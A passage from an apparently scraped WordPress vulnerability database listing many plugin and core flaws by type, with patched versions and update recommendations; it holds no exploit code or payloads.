Patched Version: 1.3.9.3
Recommended Action: Update to version 1.3.9.3, or a newer patched version

Plugin: sintic_gallery

Plugin: Auto Publish for Google My Business

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.8
Recommended Action: Update to version 3.8, or a newer patched version

Plugin: WordPress + Microsoft Office 365 / Azure AD | LOGIN

Vulnerability: Authentication Bypass
Patched Version: 11.7
Recommended Action: Update to version 11.7, or a newer patched version

Plugin: Email Subscriber

Plugin: Everest Forms – Build Contact Forms, Surveys, Polls, Quizzes, Newsletter & Application Forms, and Many More with Ease!

Vulnerability: SQL Injection
Patched Version: 1.5.0
Recommended Action: Update to version 1.5.0, or a newer patched version

Plugin: Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 4.5.1
Recommended Action: Update to version 4.5.1, or a newer patched version

Plugin: OWM Weather

Vulnerability: Cross-Site Request Forgery
Patched Version: 5.6.12
Recommended Action: Update to version 5.6.12, or a newer patched version

Plugin: Advance Menu Manager

Vulnerability: Cross-Site Request Forgery to Menu Edition
Patched Version: 3.0
Recommended Action: Update to version 3.0, or a newer patched version

Plugin: Revamp CRM for WooCommerce

Vulnerability: Local File Inclusion
Patched Version: 1.0.4
Recommended Action: Update to version 1.0.4, or a newer patched version

Plugin: WP ULike – All-in-One Engagement Toolkit

Vulnerability: Race Condition
Patched Version: 4.6.5
Recommended Action: Update to version 4.6.5, or a newer patched version

Plugin: Advanced Order Export For WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.1.8
Recommended Action: Update to version 3.1.8, or a newer patched version

Plugin: Contact Form by Supsystic

Vulnerability: SQL Injections
Patched Version: 1.7.11
Recommended Action: Update to version 1.7.11, or a newer patched version

Plugin: illi Link Party!

Vulnerability: Missing Authorization to Unauthenticated Arbitrary Link Deletion
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Navis DocumentCloud

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 0.1.1
Recommended Action: Update to version 0.1.1, or a newer patched version

Plugin: Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 7.3.11
Recommended Action: Update to version 7.3.11, or a newer patched version

Plugin: wp-forum

Plugin: Ultimate Noindex Nofollow Tool

Plugin: Cart66 Lite :: WordPress Ecommerce

Vulnerability: Cross-Site Scripting
Patched Version: 1.5.1.15
Recommended Action: Update to version 1.5.1.15, or a newer patched version

Plugin: Allow PHP in Posts and Pages

Vulnerability: Authenticated (Subscriber+) Remote Code Execution via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Text Hover

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 4.2
Recommended Action: Update to version 4.2, or a newer patched version

Plugin: HUSKY – Products Filter Professional for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.3.4.4
Recommended Action: Update to version 1.3.4.4, or a newer patched version

Plugin: School Management System for WordPress

Vulnerability: Authenticated (Student+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: MySliderGallery

Vulnerability: Remote File Inclusion
Patched Version: 1.4b5
Recommended Action: Update to version 1.4b5, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 3.7.6
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.6, 3.8.6, 3.9.4, 4.0.2, 4.1.2

Plugin: WP Meta and Date Remover

Vulnerability: Authenticated (Subscriber+) Stored Cross-Site Scripting via settings
Patched Version: 2.2.0
Recommended Action: Update to version 2.2.0, or a newer patched version

Plugin: Game Server Status

Plugin: ClickFunnels

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Tiempo.com

Vulnerability: Cross-Site Request Forgery to Shortcode Deletion
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: Cross-Site Scripting
Patched Version: 3.2.14
Recommended Action: Update to version 3.2.14, or a newer patched version

Plugin: All in One SEO – Powerful SEO Plugin to Boost SEO Rankings & Increase Traffic

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 4.3.0
Recommended Action: Update to version 4.3.0, or a newer patched version

Plugin: GiveWP – Donation Plugin and Fundraising Platform

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.21.3
Recommended Action: Update to version 2.21.3, or a newer patched version

Plugin: Royal Elementor Addons and Templates

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.3.56
Recommended Action: Update to version 1.3.56, or a newer patched version

Plugin: Accordion Slider

Vulnerability: Missing Authorization to Notice Dismissal
Patched Version: 1.9.7
Recommended Action: Update to version 1.9.7, or a newer patched version

Plugin: Mobile Assistant Connector

Vulnerability: SQL Injection
Patched Version: 2.2.3
Recommended Action: Update to version 2.2.3, or a newer patched version

Plugin: Embedded Video

Plugin: WordPress Classifieds Plugin – Ad Directory & Listings by AWP Classifieds

Vulnerability: Unauthenticated SQL Injection
Patched Version: 4.3
Recommended Action: Update to version 4.3, or a newer patched version

Plugin: Schema App Structured Data

Vulnerability: Missing Authorization via page_init
Patched Version: 1.22.4
Recommended Action: Update to version 1.22.4, or a newer patched version

Plugin: WP-Stats

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.52
Recommended Action: Update to version 2.52, or a newer patched version

Plugin: VikBooking Hotel Booking Engine & PMS

Vulnerability: Sensitive Information Exposure
Patched Version: 1.5.4
Recommended Action: Update to version 1.5.4, or a newer patched version

Plugin: Locations

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 4.0
Recommended Action: Update to version 4.0, or a newer patched version

Plugin: Advanced Custom Fields (ACF)

Vulnerability: Remote Code Execution via Remote File Inclusion
Patched Version: 3.5.2
Recommended Action: Update to version 3.5.2, or a newer patched version

Plugin: Recall Products

Plugin: Divi Builder

Vulnerability: Arbitrary File Upload
Patched Version: 4.5.3
Recommended Action: Update to version 4.5.3, or a newer patched version

Plugin: Product Category Tree

Plugin: Webcam Microphone Screen Recorder HTML5

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.55.5
Recommended Action: Update to version 1.55.5, or a newer patched version

Plugin: Images Asynchronous Load

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.06
Recommended Action: Update to version 1.06, or a newer patched version

Plugin: WordPress Multisite Content Copier/Updater Pro

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.1.2
Recommended Action: Update to version 2.1.2, or a newer patched version

Plugin: enigma-chartjs

Vulnerability: Authenticated(Editor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Album and Image Gallery with Lightbox – Flagallery Photo Portfolio

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.73
Recommended Action: Update to version 1.73, or a newer patched version

Plugin: JS Job Manager

Vulnerability: Arbitrary Plugin Installation/Activation
Patched Version: 1.1.9
Recommended Action: Update to version 1.1.9, or a newer patched version

Plugin: Advanced AJAX Product Filters

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.5.4.7
Recommended Action: Update to version 1.5.4.7, or a newer patched version

Plugin: JetBackup – WP Backup, Migrate & Restore

Vulnerability: Sensitive Information Disclosure
Patched Version: 1.4.1
Recommended Action: Update to version 1.4.1, or a newer patched version

Plugin: Image Optimization by Optimole – Lazy Load, CDN, Convert WebP & AVIF

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 3.3.2
Recommended Action: Update to version 3.3.2, or a newer patched version

Plugin: YOP Poll

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 6.1.5
Recommended Action: Update to version 6.1.5, or a newer patched version

Plugin: YouTube Embed, Playlist and Popup by WpDevArt

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.6.4
Recommended Action: Update to version 2.6.4, or a newer patched version

Plugin: Photos, Files, YouTube, Twitter, Instagram, TikTok, Ecommerce Contest Gallery – Upload, Vote, Sell via PayPal, Social Share Buttons

Vulnerability: Unauthenticated Stored Cross-Site Scripting via headers
Patched Version: 21.2.8.1
Recommended Action: Update to version 21.2.8.1, or a newer patched version

Plugin: Simple Wp Sitemap

Plugin: Open Close WooCommerce Store – Best Business Schedules Manager

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.3.1
Recommended Action: Update to version 4.3.1, or a newer patched version

Plugin: OneClick Chat to Order

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.0.6
Recommended Action: Update to version 1.0.6, or a newer patched version

Plugin: Ad Inserter – Ad Manager & AdSense Ads

Vulnerability: Authenticated Path Traversal
Patched Version: 2.4.20
Recommended Action: Update to version 2.4.20, or a newer patched version

Plugin: Easy Redirect Manager

Plugin: myCred – Points Management System For Gamification, Ranks, Badges, and Loyalty Rewards Program.

Vulnerability: Missing Authorization
Patched Version: 2.4.4
Recommended Action: Update to version 2.4.4, or a newer patched version

Plugin: WP Comment Remix

Vulnerability: SQL Injection
Patched Version: 1.4.4
Recommended Action: Update to version 1.4.4, or a newer patched version

Plugin: JetBackup – WP Backup, Migrate & Restore

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.47
Recommended Action: Update to version 1.1.47, or a newer patched version

Plugin: SupportFlow

Vulnerability: Stored Cross-Site Scripting via discussion ticket title
Patched Version: 0.7
Recommended Action: Update to version 0.7, or a newer patched version

Plugin: HUSKY – Products Filter Professional for WooCommerce

Vulnerability: Products Filter for WooCommerce <= 1.1.9
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: Keyword Meta

Vulnerability: Cross-Site Scripting
Patched Version: 3.1
Recommended Action: Update to version 3.1, or a newer patched version

Plugin: WP Support Plus Responsive Ticket System

Vulnerability: Improper Authentication
Patched Version: 4.2
Recommended Action: Update to version 4.2, or a newer patched version

Plugin: Post Views Counter

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.3.5
Recommended Action: Update to version 1.3.5, or a newer patched version

Plugin: Login Block IPs

Vulnerability: IP Spoofing to Protection Mechanism Bypass
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Privacy Policy Generator, Terms & Conditions Generator WordPress Plugin : WP Legal Pages

Vulnerability: WPLegalPages <= 2.7.0
Patched Version: 2.7.1
Recommended Action: Update to version 2.7.1, or a newer patched version

Plugin: Image Intense

Vulnerability: SQL Injection
Patched Version: 3.2.6
Recommended Action: Update to version 3.2.6, or a newer patched version

Plugin: Slideshow Gallery LITE

Vulnerability: SQL Injection
Patched Version: 1.6.9
Recommended Action: Update to version 1.6.9, or a newer patched version

Plugin: Gift Up Gift Cards for WordPress and WooCommerce

Vulnerability: Cross-Site Request Forgery via consume_post
Patched Version: 2.22
Recommended Action: Update to version 2.22, or a newer patched version

Plugin: Qiniu Uploader

Plugin: Easy PayPal & Stripe Buy Now Button

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.7.4
Recommended Action: Update to version 1.7.4, or a newer patched version

Plugin: FavIcon Switcher

Plugin: WP Reset Pro – Most Advanced WordPress Reset Tool

Vulnerability: Missing Authorization to Database Reset
Patched Version: 5.99
Recommended Action: Update to version 5.99, or a newer patched version

Plugin: Photos, Files, YouTube, Twitter, Instagram, TikTok, Ecommerce Contest Gallery – Upload, Vote, Sell via PayPal, Social Share Buttons

Vulnerability: Authenticated (Author+) SQL Injection via cg_copy_id
Patched Version: 19.1.5
Recommended Action: Update to version 19.1.5, or a newer patched version

Plugin: Ads Box

Plugin: Cooked – Recipe Management

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.7.9.1
Recommended Action: Update to version 1.7.9.1, or a newer patched version

Plugin: Simple Tooltips

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.1.4
Recommended Action: Update to version 2.1.4, or a newer patched version

Plugin: Limit Attempts by BestWebSoft – WordPress Anti-Bot and Security Plugin for Login and Forms

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.8
Recommended Action: Update to version 1.1.8, or a newer patched version

Plugin: WooCommerce Box Office

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.1.51
Recommended Action: Update to version 1.1.51, or a newer patched version

Plugin: WP Fastest Cache

Vulnerability: Local File Inclusion
Patched Version: 0.8.5.8
Recommended Action: Update to version 0.8.5.8, or a newer patched version

Plugin: NotificationX – Live Sales Notification, WooCommerce Sales Popup, FOMO, Social Proof, Announcement Banner & Floating Notification Top Bar

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 1.8.3
Recommended Action: Update to version 1.8.3, or a newer patched version

Plugin: Disqus Comment System

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.76
Recommended Action: Update to version 2.76, or a newer patched version

Plugin: bbPress Login Register Links On Forum Topic Pages

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.8.5
Recommended Action: Update to version 2.8.5, or a newer patched version

Plugin: Plotly

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.0.3
Recommended Action: Update to version 1.0.3, or a newer patched version

Plugin: Elementor Website Builder Pro

Vulnerability: Authenticated (Subscriber+) Arbitrary File Upload
Patched Version: 2.9.4
Recommended Action: Update to version 2.9.4, or a newer patched version

Plugin: AI ChatBot for WordPress – WPBot

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 4.6.1
Recommended Action: Update to version 4.6.1, or a newer patched version

Plugin: Admin Word Count Column

Vulnerability: Arbitrary File Read
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Woocommerce Tranzila Payment Gateway

Vulnerability: Unauthenticated PHP Object Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Platinum SEO

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.3.8
Recommended Action: Update to version 1.3.8, or a newer patched version

Plugin: Plausible Analytics

Vulnerability: Reflected Cross-Site Scripting via page-url
Patched Version: 1.3.4
Recommended Action: Update to version 1.3.4, or a newer patched version

Plugin: Titan Anti-spam & Security

Vulnerability: IP Spoofing to Protection Bypass
Patched Version: 7.3.1
Recommended Action: Update to version 7.3.1, or a newer patched version

Plugin: GNU-Mailman Integration

Plugin: SEO Plugin by Squirrly SEO

Vulnerability: Reflected Cross-Site Scripting via ‘page’ and ‘tab’
Patched Version: 12.1.21
Recommended Action: Update to version 12.1.21, or a newer patched version

Plugin: Turn off all comments

Plugin: stats

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.1
Recommended Action: Update to version 1.1, or a newer patched version

Plugin: Fast Custom Social Share by CodeBard

Plugin: Active Directory Integration / LDAP Integration

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 4.1.5
Recommended Action: Update to version 4.1.5, or a newer patched version

Plugin: Simple Staff List

Vulnerability: Missing Authorization via ajax_flush_rewrite_rules and staff_member_export
Patched Version: 2.2.5
Recommended Action: Update to version 2.2.5, or a newer patched version

Plugin: Affiliate Ads for cbAds.com

Vulnerability: Cross-Site Scripting
Patched Version: 1.35
Recommended Action: Update to version 1.35, or a newer patched version

Plugin: Travel Map

Vulnerability: Unauthenticated Cross-Site Scripting
Patched Version: 1.0.2
Recommended Action: Update to version 1.0.2, or a newer patched version

Plugin: Simple Fields

Plugin: WHMCS Bridge

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 6.4b
Recommended Action: Update to version 6.4b, or a newer patched version

Plugin: Image Gallery – Responsive Photo Gallery

Vulnerability: Reflected Cross-Site Scripting via linkbutton
Patched Version: 1.7.1
Recommended Action: Update to version 1.7.1, or a newer patched version

Plugin: E2Pdf – Export Pdf Tool for WordPress

Vulnerability: Authenticated(Administrator+) SQL Injection
Patched Version: 1.20.24
Recommended Action: Update to version 1.20.24, or a newer patched version

Plugin: Campaign Monitor Forms by Optin Cat

Vulnerability: Missing Authorization to Authenticated(Subscriber+) Options Update via ajax_dismiss_notice
Patched Version: 2.5.6
Recommended Action: Update to version 2.5.6, or a newer patched version

Plugin: Dropdown Menu Widget

Plugin: DJ EmailPublish

Plugin: JoomSport – for Sports: Team & League, Football, Hockey & more

Vulnerability: Unauthenticated SQL Injection
Patched Version: 5.2.8
Recommended Action: Update to version 5.2.8, or a newer patched version

Plugin: WP Stripe Checkout

Vulnerability: Sensitive Information Exposure via Debug Log
Patched Version: 1.2.2.38
Recommended Action: Update to version 1.2.2.38, or a newer patched version

Plugin: IFrame Shortcode

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.0.6
Recommended Action: Update to version 1.0.6, or a newer patched version

Plugin: JetEngine

Vulnerability: Missing Authorization
Patched Version: 3.2.5
Recommended Action: Update to version 3.2.5, or a newer patched version

Plugin: Smart Post Show – Post Grid, Post Carousel, Post Slider, Post Timeline, Post Table, and List Category Posts, Latest Posts, Recent Posts, Popular Posts and More

Vulnerability: Missing Capabilities Check
Patched Version: 2.3.5
Recommended Action: Update to version 2.3.5, or a newer patched version

Plugin: Glass

Plugin: Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker

Vulnerability: Stored Cross-Site Scripting
Patched Version: 7.0.0
Recommended Action: Update to version 7.0.0, or a newer patched version

Core: WordPress

Vulnerability: Sensitive Information Disclosure
Patched Version: 3.0
Recommended Action: Update to one of the following versions, or a newer patched version: 3.0, 3.0.5

Plugin: Popup Builder by OptinMonster – WordPress Popups for Optins, Email Newsletters and Lead Generation

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.6.1
Recommended Action: Update to version 2.6.1, or a newer patched version

Plugin: Slider by 10Web – Responsive Image Slider

Vulnerability: Authenticated (Admin+) Cross-Site Scripting
Patched Version: 1.2.53
Recommended Action: Update to version 1.2.53, or a newer patched version

Plugin: Breadcrumb NavXT

Vulnerability: Sensitive Data Exposure
Patched Version: 6.2.0
Recommended Action: Update to version 6.2.0, or a newer patched version

Plugin: WP Shop

Vulnerability: SQL Injection
Patched Version: 3.4.3.16
Recommended Action: Update to version 3.4.3.16, or a newer patched version

Plugin: WebP Express

Vulnerability: Arbitrary File Read
Patched Version: 0.14.11
Recommended Action: Update to version 0.14.11, or a newer patched version

Plugin: CM Tooltip Glossary

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 3.9.21
Recommended Action: Update to version 3.9.21, or a newer patched version

Plugin: custom-metas

Plugin: Order XML File Export Import for WooCommerce

Vulnerability: Cross-Site Scripting
Patched Version: 1.2.3
Recommended Action: Update to version 1.2.3, or a newer patched version

Plugin: Add Social Share Buttons for Whatsapp and Viber

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.1
Recommended Action: Update to version 1.1, or a newer patched version

Plugin: Salat Times

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.2.2
Recommended Action: Update to version 3.2.2, or a newer patched version

Plugin: yahoo-updates-for-wordpress

Plugin: Clean Login

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.10.4
Recommended Action: Update to version 1.10.4, or a newer patched version

Plugin: GoCodes

Plugin: Community Events

Vulnerability: SQL Injection
Patched Version: 1.4
Recommended Action: Update to version 1.4, or a newer patched version

Plugin: Duplicator – Backups & Migration Plugin – Cloud Backups, Scheduled Backups, & More

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: WordPress Pinterest Plugin – Make a Popup, User Profile, Masonry and Gallery Layout

Vulnerability: Missing Authorization via _update_shortcode
Patched Version: 1.8.1
Recommended Action: Update to version 1.8.1, or a newer patched version

Plugin: Stock Ticker

Vulnerability: Reflected Cross-Site Scripting in ajax_stockticker_symbol_search_test
Patched Version: 3.23.3
Recommended Action: Update to version 3.23.3, or a newer patched version

Plugin: Pixel Cat – Conversion Pixel Manager

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 2.6.3
Recommended Action: Update to version 2.6.3, or a newer patched version

Plugin: AI Power: Complete AI Pack

Vulnerability: Missing Authorization to Sensitive Data Exposure
Patched Version: 1.8.3
Recommended Action: Update to version 1.8.3, or a newer patched version

Plugin: SP Project & Document Manager

Vulnerability: Multiple SQL Injection
Patched Version: 2.4.4
Recommended Action: Update to version 2.4.4, or a newer patched version

Plugin: FunCaptcha – Anti-Spam CAPTCHA

Vulnerability: Cross-Site Request Forgery
Patched Version: 0.3.3
Recommended Action: Update to version 0.3.3, or a newer patched version

Plugin: Login/Signup Popup ( Inline Form + Woocommerce )

Vulnerability: Cross-Site Request Forgery to Settings Reset
Patched Version: 2.4
Recommended Action: Update to version 2.4, or a newer patched version

Plugin: We’re Open!

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.42
Recommended Action: Update to version 1.42, or a newer patched version

Plugin: WPPerformanceTester

Plugin: Register Plus Redux

Plugin: Ultimeter

Vulnerability: Missing Authorization to Arbitrary Options Update
Patched Version: 1.9.3
Recommended Action: Update to version 1.9.3, or a newer patched version

Plugin: Advanced Text Widget

Vulnerability: Missing Authorization via atw_dismiss_admin_notice
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Sidebar Widgets by CodeLights

Plugin: Loan Comparison

Vulnerability: Authenticated (Contributor+) Cross-Site Scripting via Shortcode
Patched Version: 1.5.3
Recommended Action: Update to version 1.5.3, or a newer patched version

Plugin: WP Testimonials

Vulnerability: Cross-Site Request Forgery to Widget Deletion
Patched Version: 1.4.3
Recommended Action: Update to version 1.4.3, or a newer patched version

Plugin: Sitemap Index

Vulnerability: Authenticated(Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Easy Digital Downloads (EDD) Stripe

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.1.3
Recommended Action: Update to version 2.1.3, or a newer patched version

Plugin: WC Captcha

Plugin: EELV Newsletter

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.3.1
Recommended Action: Update to version 3.3.1, or a newer patched version

Plugin: MainWP Wordfence Extension

Vulnerability: Missing Authorization to Arbitrary Plugin Activation
Patched Version: 4.0.8
Recommended Action: Update to version 4.0.8, or a newer patched version

Plugin: Accordion – Multiple Accordion or FAQs Builder

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via Several Parameters
Patched Version: 2.3.1
Recommended Action: Update to version 2.3.1, or a newer patched version

Plugin: MailPoet Newsletters (Previous)

Vulnerability: Cross-Site Scripting
Patched Version: 2.1.7
Recommended Action: Update to version 2.1.7, or a newer patched version

Plugin: BuddyPress

Vulnerability: Missing Authorization to Private Post Activity
Patched Version: 7.3.0
Recommended Action: Update to version 7.3.0, or a newer patched version

Plugin: Database Cleaner

Vulnerability: Sensitive Information Exposure via Log File
Patched Version: 0.9.9
Recommended Action: Update to version 0.9.9, or a newer patched version

Plugin: Easy Cookie Law

Vulnerability: Cross-Site Request Forgery via ‘ecl_options’
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Hotel Listings

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.3.3
Recommended Action: Update to version 1.3.3, or a newer patched version

Plugin: Post Hit Counter

Plugin: WP All Import Pro

Vulnerability: Reflected Cross Site Scripting
Patched Version: 4.1.1
Recommended Action: Update to version 4.1.1, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting via Media Metadata
Patched Version: 3.7.19
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.19, 3.8.19, 3.9.17, 4.0.16, 4.1.16, 4.2.13, 4.3.9, 4.4.8, 4.5.7, 4.6.4, 4.7.3

Plugin: Intelligent WordPress Live Chat Support Plugin | Utilities

Plugin: Database Backup for WordPress

Vulnerability: Admin+ SQL Injection
Patched Version: 2.5.1
Recommended Action: Update to version 2.5.1, or a newer patched version

Plugin: Data Tables Generator by Supsystic

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.9.92
Recommended Action: Update to version 1.9.92, or a newer patched version

Plugin: ActivityPub

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Post Content
Patched Version: 1.0.0
Recommended Action: Update to version 1.0.0, or a newer patched version

Plugin: Import any XML, CSV or Excel File to WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 3.4.6
Recommended Action: Update to version 3.4.6, or a newer patched version

Plugin: WordPress Simple Shopping Cart

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.6
Recommended Action: Update to version 3.6, or a newer patched version

Plugin: UserPro – Community and User Profile WordPress Plugin

Vulnerability: Sensitive Information Disclosure via Shortcode
Patched Version: 5.1.2
Recommended Action: Update to version 5.1.2, or a newer patched version

Plugin: WP Show Posts

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: BuddyPress

Vulnerability: SQL Injection
Patched Version: 9.1.1
Recommended Action: Update to version 9.1.1, or a newer patched version

Plugin: Photos, Files, YouTube, Twitter, Instagram, TikTok, Ecommerce Contest Gallery – Upload, Vote, Sell via PayPal, Social Share Buttons

Vulnerability: Authenticated (Author+) SQL Injection via cg_copy_start
Patched Version: 19.1.5
Recommended Action: Update to version 19.1.5, or a newer patched version

Plugin: Menu Image, Icons made easy

Vulnerability: Authenticated Cross-Site Scripting
Patched Version: 3.0.8
Recommended Action: Update to version 3.0.8, or a newer patched version

Plugin: Gmedia Photo Gallery

Vulnerability: Open Proxy
Patched Version: 1.6.5
Recommended Action: Update to version 1.6.5, or a newer patched version

Plugin: Gallery – Image and Video Gallery with Thumbnails

Vulnerability: SQL Injection
Patched Version: 1.2.1
Recommended Action: Update to version 1.2.1, or a newer patched version

Plugin: Nested Pages

Vulnerability: Open Redirect
Patched Version: 3.1.16
Recommended Action: Update to version 3.1.16, or a newer patched version

Plugin: LearnDash LMS

Vulnerability: Authenticated (Contributor+) SQL Injection
Patched Version: 4.5.3.1
Recommended Action: Update to version 4.5.3.1, or a newer patched version

Plugin: Pixabay Images

Vulnerability: Authentication Bypass to Arbitrary File Upload
Patched Version: 2.4
Recommended Action: Update to version 2.4, or a newer patched version

Plugin: CC Child Pages

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.43
Recommended Action: Update to version 1.43, or a newer patched version

Plugin: 2 Click Social Media Buttons

Vulnerability: Multiple Cross-Site Scripting
Patched Version: 0.34
Recommended Action: Update to version 0.34, or a newer patched version

Plugin: BEAR – Bulk Editor and Products Manager Professional for WooCommerce by Pluginus.Net

Vulnerability: Cross-Site Request Forgery to Product Manipulation
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: Discount Rules for WooCommerce – Create Smart WooCommerce Coupons & Discounts, Bulk Discount, BOGO Coupons

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.4.2
Recommended Action: Update to version 2.4.2, or a newer patched version

Plugin: VK All in One Expansion Unit

Vulnerability: Stored (Contributor+) Cross-Site Scripting in Profile Setting
Patched Version: 9.88.2.0
Recommended Action: Update to version 9.88.2.0, or a newer patched version

Plugin: UpdraftPlus: WP Backup & Migration Plugin

Vulnerability: Authenticated (Admin+) Local File Inclusion
Patched Version: 1.16.59
Recommended Action: Update to version 1.16.59, or a newer patched version

Plugin: Easy Photo Album

Vulnerability: Sensitive Information Disclosure
Patched Version: 1.1.6
Recommended Action: Update to version 1.1.6, or a newer patched version

Plugin: Ultimate GDPR & CCPA Compliance Toolkit for WordPress

Vulnerability: Unauthenticated Settings Import & Export
Patched Version: 2.5
Recommended Action: Update to version 2.5, or a newer patched version

Plugin: Limit Login Attempts

Vulnerability: Administrator+ Cross-Site Scripting
Patched Version: 4.0.72
Recommended Action: Update to version 4.0.72, or a newer patched version

Plugin: GiveWP – Donation Plugin and Fundraising Platform

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 0.8.5
Recommended Action: Update to version 0.8.5, or a newer patched version

Plugin: Add Comments

Plugin: KiviCare – Clinic & Patient Management System (EHR)

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.2.1
Recommended Action: Update to version 3.2.1, or a newer patched version

Plugin: Wicked Folders

Vulnerability: Cross-Site Request Forgery via ajax_save_folder_order
Patched Version: 2.18.17
